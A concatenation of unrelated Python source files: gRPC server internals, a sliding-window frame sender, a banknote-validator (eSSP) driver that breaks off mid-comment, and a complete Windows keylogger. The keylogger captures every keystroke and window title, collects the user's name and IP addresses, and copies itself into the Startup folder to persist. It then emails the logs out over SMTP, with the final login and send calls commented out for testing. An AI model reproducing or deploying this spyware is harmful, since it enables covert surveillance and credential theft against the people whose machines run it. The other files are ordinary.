def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
cygrpc.install_context_from_request_call_event(rpc_event)
def send_response(response):
if response is None:
_status(rpc_event, state, None)
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_send_response(rpc_event, state, serialized_response)
try:
argument = argument_thunk()
if argument is not None:
if hasattr(behavior, 'experimental_non_blocking'
) and behavior.experimental_non_blocking:
_call_behavior(
rpc_event,
state,
behavior,
argument,
request_deserializer,
send_response_callback=send_response)
else:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
_send_message_callback_to_blocking_iterator_adapter(
rpc_event, state, send_response, response_iterator)
finally:
cygrpc.uninstall_context()
def _is_rpc_state_active(state):
return state.client is not _CANCELLED and not state.statused
def _send_message_callback_to_blocking_iterator_adapter(
rpc_event, state, send_response_callback, response_iterator):
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
send_response_callback(response)
if not _is_rpc_state_active(state):
break
else:
break
def _select_thread_pool_for_behavior(behavior, default_thread_pool):
if hasattr(behavior, 'experimental_thread_pool') and isinstance(
behavior.experimental_thread_pool, futures.ThreadPoolExecutor):
return behavior.experimental_thread_pool
else:
return default_thread_pool
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_unary,
default_thread_pool)
return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_stream,
default_thread_pool)
return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, default_thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.stream_unary,
default_thread_pool)
return thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler,
default_thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.stream_stream,
default_thread_pool)
return thread_pool.submit(
_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer, method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
def query_handlers(handler_call_details):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(handler_call_details)
if method_handler is not None:
return method_handler
return None
handler_call_details = _HandlerCallDetails(
_common.decode(rpc_event.call_details.method),
rpc_event.invocation_metadata)
if interceptor_pipeline is not None:
return interceptor_pipeline.execute(query_handlers,
handler_call_details)
else:
return query_handlers(handler_call_details)
def _reject_rpc(rpc_event, status, details):
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(None, status, details,
_EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.call.start_server_batch(operations,
lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
return state, _handle_stream_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_stream_unary(rpc_event, state,
method_handler, thread_pool)
else:
if method_handler.response_streaming:
return state, _handle_unary_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_unary_unary(rpc_event, state,
method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
concurrency_exceeded):
if not rpc_event.success:
return None, None
if rpc_event.call_details.method is not None:
try:
method_handler = _find_method_handler(rpc_event, generic_handlers,
interceptor_pipeline)
except Exception as exception: # pylint: disable=broad-except
details = 'Exception servicing handler: {}'.format(exception)
_LOGGER.exception(details)
return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
b'Error in service handler!'), None
if method_handler is None:
return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
b'Method not found!'), None
elif concurrency_exceeded:
return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
b'Concurrent RPC limit exceeded!'), None
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None, None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
# pylint: disable=too-many-arguments
def __init__(self, completion_queue, server, generic_handlers,
interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
self.lock = threading.RLock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.interceptor_pipeline = interceptor_pipeline
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
self.active_rpc_count = 0
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
# A "volatile" flag to interrupt the daemon serving thread
self.server_deallocated = False
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
state.server.destroy()
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _on_call_completed(state):
with state.lock:
state.active_rpc_count -= 1
def _process_event_and_continue(state, event):
should_continue = True
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
should_continue = False
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
concurrency_exceeded = (
state.maximum_concurrent_rpcs is not None and
state.active_rpc_count >= state.maximum_concurrent_rpcs)
rpc_state, rpc_future = _handle_call(
event, state.generic_handlers, state.interceptor_pipeline,
state.thread_pool, concurrency_exceeded)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if rpc_future is not None:
state.active_rpc_count += 1
rpc_future.add_done_callback(
lambda unused_future: _on_call_completed(state))
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
should_continue = False
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
try:
callback()
except Exception: # pylint: disable=broad-except
_LOGGER.exception('Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
should_continue = False
return should_continue
def _serve(state):
while True:
timeout = time.time() + _DEALLOCATED_SERVER_CHECK_PERIOD_S
event = state.completion_queue.poll(timeout)
if state.server_deallocated:
_begin_shutdown_once(state)
if event.completion_type != cygrpc.CompletionType.queue_timeout:
if not _process_event_and_continue(state, event):
return
# We want to force the deletion of the previous event
# ~before~ we poll again; if the event has a reference
# to a shutdown Call object, this can induce spinlock.
event = None
def _begin_shutdown_once(state):
with state.lock:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
_begin_shutdown_once(state)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
thread = threading.Thread(target=_serve, args=(state,))
thread.daemon = True
thread.start()
def _validate_generic_rpc_handlers(generic_rpc_handlers):
for generic_rpc_handler in generic_rpc_handlers:
service_attribute = getattr(generic_rpc_handler, 'service', None)
if service_attribute is None:
raise AttributeError(
'"{}" must conform to grpc.GenericRpcHandler type but does '
'not have "service" method!'.format(generic_rpc_handler))
class _Server(grpc.Server):
# pylint: disable=too-many-arguments
def __init__(self, thread_pool, generic_handlers, interceptors, options,
maximum_concurrent_rpcs):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(options)
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
_interceptor.service_pipeline(interceptors),
thread_pool, maximum_concurrent_rpcs)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_validate_generic_rpc_handlers(generic_rpc_handlers)
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address),
server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
if hasattr(self, '_state'):
# We can not grab a lock in __del__(), so set a flag to signal the
# serving daemon thread (if it exists) to initiate shutdown.
self._state.server_deallocated = True
def create_server(thread_pool, generic_rpc_handlers, interceptors, options,
maximum_concurrent_rpcs):
_validate_generic_rpc_handlers(generic_rpc_handlers)
return _Server(thread_pool, generic_rpc_handlers, interceptors, options,
maximum_concurrent_rpcs)
|
sender.py | import time
import threading
from frameHelper import Frame
import logger
# define maximum window size
MAX_WINDOW_SIZE = 7
# define time-out time in seconds
timeout=2
# store all the round-trip times
rttList = []
class Sender:
def __init__(self, connection, name:str, senderAddress:int, receiverName:str, receiverAddress:int ,fileName:str):
# get the client/receiver connection and other informations (name, data file name)
self.connection = connection
self.name = name
self.receiver = receiverName
self.fileName = fileName
self.senderAddress = senderAddress
self.receiverAddress = receiverAddress
# some transmission control variables and flags
self.frameType = {'data' : 0, 'ack' : 1}
self.eot = False
self.front = 0
self.end = 0
self.window_size = 0
self.frameCount = 0
self.totalFrameCount = 0
self.current_window = [0 for i in range(0,8)]
self.frame_timer = [0 for i in range(0,8)]
self.lock = threading.Lock()
def isValidACK (self, ack_no:int):
"""Function to check if the acknowledgement number lies within window"""
# if Ack is valid, return true
if((self.front<ack_no and ack_no<=self.end) or (self.end<self.front and self.front<ack_no) or (ack_no<=self.end and self.end<self.front)):
return True
# if Ack number lies outside range, return false
else:
return False
def resendFrames (self):
"""Function to handle frame resending"""
time.sleep(0.2)
# loop until end of transmission
while (not self.eot) or (self.window_size>0):
# if any frames were sent
if(self.window_size>0):
current_time = time.time()
front_waiting_time = current_time - self.frame_timer[self.front]
# if time-out occurs and there is a valid outstanding window
# resend all the frames in the window again and restart timer
if(front_waiting_time > timeout):
self.lock.acquire()
temp = self.front
while (temp != self.end):
# resend the frame
self.connection.send(str.encode(self.current_window[temp].frame))
print("STATUS: FRAME",temp,"RESENT")
# restart the timer
self.frame_timer[temp] = time.time()
# move to the next frame
temp = (temp+1)%(MAX_WINDOW_SIZE+1)
# increment no of frames sent
self.totalFrameCount += 1
self.lock.release()
def sendFrames(self):
"""Function to handle data sending"""
time.sleep(0.2)
# open data file for reading
file = open(self.fileName,'r')
# read data from file
data = file.read(46)
# loop until whole data is sent
while data:
# if window is not full, send another frame
if (self.window_size<MAX_WINDOW_SIZE):
# build frame using data, type and sequence number
frame = Frame(self.senderAddress, self.receiverAddress, self.frameType['data'], self.end, data)
# store current frame for re-transmission (if needed)
self.current_window[self.end] = frame
# acquire window write lock
self.lock.acquire()
# Send the frame
self.connection.send(str.encode(frame.toBinaryString(46)))
print("\nSTATUS: FRAME",self.end,"SENT TO CHANNEL")
self.frame_timer[self.end] = time.time()
# update end, window size and other parameters accordingly
self.end = (self.end+1)%(MAX_WINDOW_SIZE+1)
self.window_size += 1
self.frameCount += 1
self.totalFrameCount += 1
# Read next data frame
data = file.read(46)
# release window write lock
self.lock.release()
# If all data has been read, break
if len(data) == 0: break
# Set the end-transmitting flag True
self.eot = True
# Close the data file
file.close()
def receiveAck(self):
"""Function to handle acknowledgement receiving"""
time.sleep(0.2)
# loop until end of transmission
while (not self.eot) or (self.window_size>0):
# if any frames were sent
if(self.window_size>0):
# wait and receive acknowledgement and build frame from that
received = self.connection.recv(384).decode()
frame=Frame.build(received)
else: continue
# if frame type is acknowledgement
if frame.getType() == 1:
# if frame has no error
if(frame.hasError()==False):
if self.isValidACK(frame.seqNo):
# Acquire lock for accessing window
self.lock.acquire()
# update the window front and window size according to the ackNo
while(self.front!=frame.seqNo):
roundTripTime = time.time() - self.frame_timer[self.front]
rttList.append(roundTripTime)
print("STATUS: FRAME",self.front,"HAS REACHED SUCCESSFULLY\n")
self.front = (self.front+1)%(MAX_WINDOW_SIZE+1)
self.window_size -= 1
# Release window access lock
self.lock.release()
else:
print("STATUS: WRONG ACK")
else:
print("STATUS: ERRONEOUS ACK")
else:
print("STATUS: RECEIVED FRAME IS NOT AN ACK")
def transmit(self):
# Receive 'start' signal from channel for synchronization
inp=self.connection.recv(1024)
# mark the start of sending
print("\nSender: "+self.name+" --------------- Receiver: "+self.receiver+"\n")
# record the strating time
startTime=time.time()
# create a thread to handle data sending
sendThread = threading.Thread(name="sendThread", target=self.sendFrames)
# create another thread to handle acknowledgement receiving
receiveAckThread = threading.Thread(name="receiveAckThread", target=self.receiveAck)
# create frame resending thread
resendThread = threading.Thread(name="resendThread",target=self.resendFrames)
# start both the threads
sendThread.start()
receiveAckThread.start()
resendThread.start()
# wait for the threads to join (End their task)
sendThread.join()
receiveAckThread.join()
resendThread.join()
# notify channel about the end of transmission
self.connection.send(str.encode("end"))
totalTime = time.time() - startTime
logger.storeLogs(self.name, self.receiver, self.frameCount, self.totalFrameCount, totalTime, rttList) |
Python advanced keylogger.py | #//python keylogging program
## You will need to comment out the prints and exception prints on code if you were to use this for real, as its testing
## i have prints on here that will tell you and let you know what part of the program is going at the time and that it is
## working
# Surport me and subscribe to my YouTube tutorial channel - https://bit.ly/2U58Lt9 / link also in my description. Thanks.
#imports
from pynput.keyboard import Key,Listener
import win32gui
import os
import time
import requests
import socket
import random
import smtplib
from os import getcwd
from shutil import copy
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import threading
import config
datetime = time.ctime(time.time())
user = os.path.expanduser('~').split('\\')[2]
publicIP = requests.get('https://api.ipify.org/').text
privateIP = socket.gethostbyname(socket.gethostname())
file_name = "\Python advanced keylogger.py"
try:
copy(getcwd()+ file_name,'C:/Users/'+ user +'/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup')
print("Copy Success")
except Exception as copyException:
print("Copy error: %s" % (copyException))
pass
msg = f'[START OF LOGS]\n *~ Date/Time: {datetime}\n *~ User-Profile: {user}\n *~ Public-IP: {publicIP}\n *~ Private-IP: {privateIP}\n\n'
logged_data = []
logged_data.append(msg)
old_app = ''
delete_file = []
if not os.path.exists("C:/sys_logs"):
os.mkdir("C:/sys_logs")
print("Monitering")
def on_press(key):
global old_app
new_app = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if new_app == 'Cortana':
new_app = 'Windows Start Menu'
else:
pass
if new_app != old_app and new_app != '':
try:
logged_data.append(f'\n[{datetime}] ~ {new_app}\n')
old_app = new_app
except Exception as appendExcetion:
print("Apend Error: %s" % (appendExcetion))
old_app = new_app
else:
pass
substitution = ['Key.enter', '[ENTER]\n', 'Key.backspace', '[BACKSPACE]', 'Key.space', ' ',
'Key.alt_l', '[ALT]', 'Key.tab', '[TAB]', 'Key.delete', '[DEL]', 'Key.ctrl_l', '[CTRL]',
'Key.left', '[LEFT ARROW]', 'Key.right', '[RIGHT ARROW]', 'Key.shift', '[SHIFT]', '\\x13',
'[CTRL-S]', '\\x17', '[CTRL-W]', 'Key.caps_lock', '[CAPS LK]', '\\x01', '[CTRL-A]', 'Key.cmd',
'[WINDOWS KEY]', 'Key.print_screen', '[PRNT SCR]', '\\x03', '[CTRL-C]', '\\x16', '[CTRL-V]']
key = str(key).strip('\'')
if key in substitution:
logged_data.append(substitution[substitution.index(key)+1])
else:
logged_data.append(key)
def write_file(count):
one = os.path.expanduser('~') + '/Downloads/'
two = os.path.expanduser('~') + '/Pictures/'
three = 'C:/sys_logs/'
list = [three]
filepath = random.choice(list)
filename = str(count) + 'I' + str(random.randint(1000000,9999999)) + '.txt'
file = filepath + filename
delete_file.append(file)
try:
with open(file,'w', encoding = "utf-8") as fp:
fp.write(''.join(logged_data))
print('written all good')
except Exception as writeException:
print("Write Error: %s" % (writeException))
def send_logs():
count = 0
fromAddr = config.fromAddr
fromPswd = config.fromPswd
toAddr = fromAddr
MIN = 10
SECONDS = 60
#time.sleep(MIN * SECONDS) # every 10 mins write file/send log
# for debugging ~ yes program works :)
while True:
time.sleep(10)
if len(logged_data) > 1:
try:
write_file(count)
subject = f'[{user}] ~ {count}'
msg = MIMEMultipart()
msg['From'] = fromAddr
msg['To'] = toAddr
msg['Subject'] = subject
body = 'testing'
msg.attach(MIMEText(body,'plain'))
attachment = open(delete_file[0],'rb')
print('attachment')
filename = delete_file[0].split('/')[2]
part = MIMEBase('application','octect-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('content-disposition','attachment;filename='+str(filename))
msg.attach(part)
text = msg.as_string()
print('test msg.as_string')
s = smtplib.SMTP('smtp.gmail.com',587)
s.ehlo()
s.starttls()
print('starttls')
# s.ehlo()
# s.login(fromAddr,fromPswd)
# s.sendmail(fromAddr,toAddr,text)
print('sent mail')
attachment.close()
s.close()
#os.remove(delete_file[0])
del logged_data[1:]
del delete_file[0:]
print('delete data/files')
count += 1
except Exception as errorString:
print('[!] send_logs // Error.. ~ %s' % (errorString))
pass
if __name__=='__main__':
T1 = threading.Thread(target=send_logs)
T1.start()
with Listener(on_press=on_press) as listener:
listener.join()
|
eSSP.py | # !/usr/bin/env python3
import threading
from ctypes import *
from time import sleep
from six.moves import queue
from .constants import Status, FailureStatus, Actions
class Ssp6ChannelData(Structure):
_fields_ = [("security", c_ubyte),
("value", c_uint),
("cc", c_char * 4)]
class Ssp6SetupRequestData(Structure):
_fields_ = [("UnitType", c_ubyte),
("FirmwareVersion", c_char * 5),
("NumberOfChannels", c_uint),
("ChannelData", Ssp6ChannelData * 20),
("RealValueMultiplier", c_ulong),
("ProtocolVersion", c_ubyte)]
class SspPollEvent6(Structure):
_fields_ = [("event", c_ubyte),
("data1", c_ulong),
("data2", c_ulong),
("cc", c_char * 4)]
class SspPollData6(Structure):
_fields_ = [("events", SspPollEvent6 * 20),
("event_count", c_ubyte)]
class eSSP(object):
"""Encrypted Smiley Secure Protocol Class"""
def __init__(self, com_port, ssp_address="0", nv11=False, debug=False):
self.debug = debug
self.nv11 = nv11
self.actions = queue.Queue()
self.actions_args = {}
self.response_data = {}
self.events = []
# There can't be 9999 notes in the storage
self.response_data['getnoteamount_response'] = 9999
self.sspC = self.essp.ssp_init(
com_port.encode(), ssp_address.encode(), debug)
self.poll = SspPollData6()
setup_req = Ssp6SetupRequestData()
# Check if the validator is present
if self.essp.ssp6_sync(self.sspC) != Status.SSP_RESPONSE_OK.value:
self.print_debug("NO VALIDATOR FOUND")
self.close()
raise Exception("No validator found")
else:
self.print_debug("Validator Found !")
# Try to setup encryption
if self.essp.ssp6_setup_encryption(self.sspC, c_ulonglong(
0x123456701234567)) == Status.SSP_RESPONSE_OK.value:
self.print_debug("Encryption Setup")
else:
self.print_debug("Encryption Failed")
# Checking the version, make sure we are using ssp version 6
if self.essp.ssp6_host_protocol(
self.sspC, 0x06) != Status.SSP_RESPONSE_OK.value:
self.print_debug(self.essp.ssp6_host_protocol(self.sspC, 0x06))
self.print_debug("Host Protocol Failed")
self.close()
raise Exception("Host Protocol Failed")
# Get some information about the validator
if self.essp.ssp6_setup_request(self.sspC, byref(
setup_req)) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Setup Request Failed")
self.close()
raise Exception("Setup request failed")
self.print_debug("Firmware %s " % (setup_req.FirmwareVersion.decode('utf8')))
self.print_debug("Channels : ")
for i, channel in enumerate(setup_req.ChannelData):
self.print_debug("Channel %s : %s %s" %
(str(i + 1), str(channel.value), channel.cc.decode()))
# Enable the validator
if self.essp.ssp6_enable(self.sspC) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Enable Failed")
self.close()
raise Exception("Enable failed")
if setup_req.UnitType == 0x03: # magic number
for channel in enumerate(setup_req.ChannelData):
self.essp.ssp6_set_coinmech_inhibits(
self.sspC, channel.value, channel.cc, Status.ENABLED.value)
else:
if setup_req.UnitType in {0x06, 0x07}:
# Enable the payout unit
if self.essp.ssp6_enable_payout(
self.sspC, setup_req.UnitType) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Payout Enable Failed")
# Set the inhibits ( enable all note acceptance )
if self.essp.ssp6_set_inhibits(
self.sspC, 0xFF, 0xFF) != Status.SSP_RESPONSE_OK.value:
self.print_debug("Inhibits Failed")
self.close()
raise Exception("Inhibits failed")
system_loop_thread = threading.Thread(target=self.system_loop)
system_loop_thread.setDaemon(True)
system_loop_thread.start()
def close(self):
"""Close the connection"""
self.reject()
self.essp.close_ssp_port()
def reject(self):
"""Reject the bill if there is one"""
if self.essp.ssp6_reject(self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("Error to reject bill OR nothing to reject")
def do_actions(self):
while not self.actions.empty():
action = self.actions.get() # get and delete
self.print_debug(action.debug_message)
if action == Actions.ROUTE_TO_CASHBOX: # Route to cashbox
if self.essp.ssp6_set_route(
self.sspC,
self.actions_args['routec_amount'],
self.actions_args['routec_currency'],
Status.ENABLED.value) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Route to cashbox failed")
elif action == Actions.ROUTE_TO_STORAGE: # Route to storage
if self.essp.ssp6_set_route(
self.sspC,
self.actions_args['routes_amount'],
self.actions_args['routes_currency'],
Status.DISABLED.value) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Route to storage failed")
elif action == Actions.PAYOUT: # Payout
if self.essp.ssp6_payout(
self.sspC,
self.actions_args['payout_amount'],
self.actions_args['payout_currency'],
Status.SSP6_OPTION_BYTE_DO.value) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Payout failed")
# Checking the error
response_data = cast(
self.essp.Status.SSP_get_response_data(
self.sspC), POINTER(c_ubyte))
if response_data[1] == Status.SMART_PAYOUT_NOT_ENOUGH:
self.print_debug(Status.SMART_PAYOUT_NOT_ENOUGH)
elif response_data[1] == Status.SMART_PAYOUT_EXACT_AMOUNT:
self.print_debug(Status.SMART_PAYOUT_EXACT_AMOUNT)
elif response_data[1] == Status.SMART_PAYOUT_BUSY:
self.print_debug(Status.SMART_PAYOUT_BUSY)
elif response_data[1] == Status.SMART_PAYOUT_DISABLED:
self.print_debug(Status.SMART_PAYOUT_DISABLED)
# Payout next note ( NV11 only )
elif action == Actions.PAYOUT_NEXT_NOTE_NV11:
self.print_debug("Payout next note")
setup_req = Ssp6SetupRequestData()
if self.essp.ssp6_setup_request(self.sspC, byref(
setup_req)) != Status.SSP_RESPONSE_OK:
self.print_debug("Setup Request Failed")
# Maybe the version, or something ( taken from the SDK C code
# )
if setup_req.UnitType != 0x07:
self.print_debug("Payout next note is only valid for NV11")
if self.essp.ssp6_payout_note(
self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("Payout next note failed")
# Stack next note ( NV11 only )
elif action == Actions.STACK_NEXT_NOTE_NV11:
setup_req = Ssp6SetupRequestData()
if self.essp.ssp6_setup_request(self.sspC, byref(
setup_req)) != Status.SSP_RESPONSE_OK:
self.print_debug("Setup Request Failed")
# Maybe the version, or something ( taken from the SDK C code
# )
if setup_req.UnitType != 0x07:
self.print_debug("Payout next note is only valid for NV11")
if self.essp.ssp6_stack_note(
self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("Stack next note failed")
elif action == Actions.DISABLE_VALIDATOR: # Disable the validator
if self.essp.ssp6_disable(
self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Disable failed")
elif action == Actions.DISABLE_PAYOUT: # Disable the payout device
if self.essp.ssp6_disable_payout(
self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Disable payout failed")
elif action == Actions.GET_NOTE_AMOUNT: # Get the note amount
if self.essp.ssp6_get_note_amount(
self.sspC,
self.actions_args['getnoteamount_amount'],
self.actions_args['getnoteamount_currency']) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Can't read the note amount")
# There can't be 9999 notes
self.response_data['getnoteamount_response'] = 9999
else:
response_data = cast(
self.essp.Status.SSP_get_response_data(
self.sspC), POINTER(c_ubyte))
self.print_debug(response_data[1])
# The number of note
self.response_data['getnoteamount_response'] = response_data[1]
# Empty the storage ( Send all to the cashbox )
elif action == Actions.EMPTY_STORAGE:
if self.essp.ssp6_empty(
self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Can't empty the storage")
else:
self.print_debug("Emptying, please wait...")
else:
self.print_debug("Unknow action")
def print_debug(self, text):
if self.debug:
print(text)
def enable_validator(self):
"""Enable the validator"""
setup_req = Ssp6SetupRequestData()
if self.essp.ssp6_enable(self.sspC) != Status.SSP_RESPONSE_OK:
self.print_debug("ERROR: Enable failed")
return False
# SMART Hopper requires different inhibit commands, so use setup
# request to see if it is an SH
if self.essp.ssp6_setup_request(self.sspC, byref(
setup_req)) != Status.SSP_RESPONSE_OK:
self.print_debug("Setup request failed")
return False
if setup_req.UnitType == 0x03: # Magic number
# SMART Hopper requires different inhibit commands
for channel in setup_req.ChannelData:
self.essp.ssp6_set_coinmech_inhibits(
self.sspC, channel.value, channel.cc, Status.ENABLED.value)
else:
if self.essp.ssp6_set_inhibits(
self.sspC, 0xFF, 0xFF) != Status.SSP_RESPONSE_OK: # Magic numbers here too
self.print_debug("Inhibits Failed")
return False
def parse_poll(self):
"""Parse the poll, for getting events"""
for events in self.poll.events:
try:
if events.event == Status.DISABLED:
pass # We don't print anything
else:
self.print_debug(Status(events.event))
except ValueError:
self.print_debug('Unknown status: {}'.format(events.event))
if events.event == Status.SSP_POLL_RESET:
if self.essp.ssp6_host_protocol(
self.sspC, 0x06) != Status.SSP_RESPONSE_OK: # Magic number
raise Exception("Host Protocol Failed")
self.close()
elif events.event == Status.SSP_POLL_READ:
if events.data1 > 0:
self.print_debug(
"Note Read %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_CREDIT:
self.print_debug(
"Credit %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_INCOMPLETE_PAYOUT:
self.print_debug(
"Incomplete payout %s of %s %s" %
(events.data1, events.data2, events.cc.decode()))
elif events.event == Status.SSP_POLL_INCOMPLETE_FLOAT:
self.print_debug(
"Incomplete float %s of %s %s" %
(events.data1, events.data2, events.cc.decode()))
elif events.event == Status.SSP_POLL_FRAUD_ATTEMPT:
self.print_debug(
"Fraud Attempt %s %s" %
(events.data1, events.cc.decode()))
self.events.append((events.data1, events.cc.decode(), events.event))
elif events.event == Status.SSP_POLL_CALIBRATION_FAIL:
self.print_debug("Calibration fail :")
self.print_debug(FailureStatus(events.data1))
if events.data1 == Status.COMMAND_RECAL:
self.print_debug("trying to run autocalibration")
self.essp.ssp6_run_calibration(self.sspC)
self.events.append((0, 0, events.event))
self.events.append((0, 0, Status.NO_EVENT))
def system_loop(self): # Looping for getting the alive signal ( obligation in eSSP6 )
while True:
rsp_status = self.essp.ssp6_poll(
self.sspC, byref(self.poll)) # Get the pool
if rsp_status != Status.SSP_RESPONSE_OK: # If there's a problem, check wath is it
if rsp_status == Status.SSP_RESPONSE_TIMEOUT: # Timeout
self.print_debug("SSP Poll Timeout")
self.close()
exit(0)
else:
if rsp_status == 0xFA:
# The self has responded with key not set, so we should
# try to negotiate one
if self.essp.ssp6_setup_encryption(self.sspC, c_ulonglong(
0x123456701234567)) == Status.SSP_RESPONSE_OK:
self.print_debug("Encryption Setup")
else:
self.print_debug("Encryption Failed")
else:
# Not theses two, stop the program
raise Exception("SSP Poll Error {}".format(rsp_status))
exit(1)
self.parse_poll()
self.do_actions()
sleep(0.5)
def get_last_event(self):
"""Get the last event and delete it from the event list"""
event = self.events[len(self.events) - 1]
self.events.pop(len(self.events) - 1)
return event
def __action_helper(self, amount, currency, action, prefix):
self.actions.put(action)
self.actions_args['{}_amount'.format(prefix)] = amount * 100
# TODO: This is one action at time, also,
# i think that the validator can receive one type of command at time,
# so TO IMPLEMENT: user can send multiple request without waiting,
# but we store them and process them every time we send commands to the
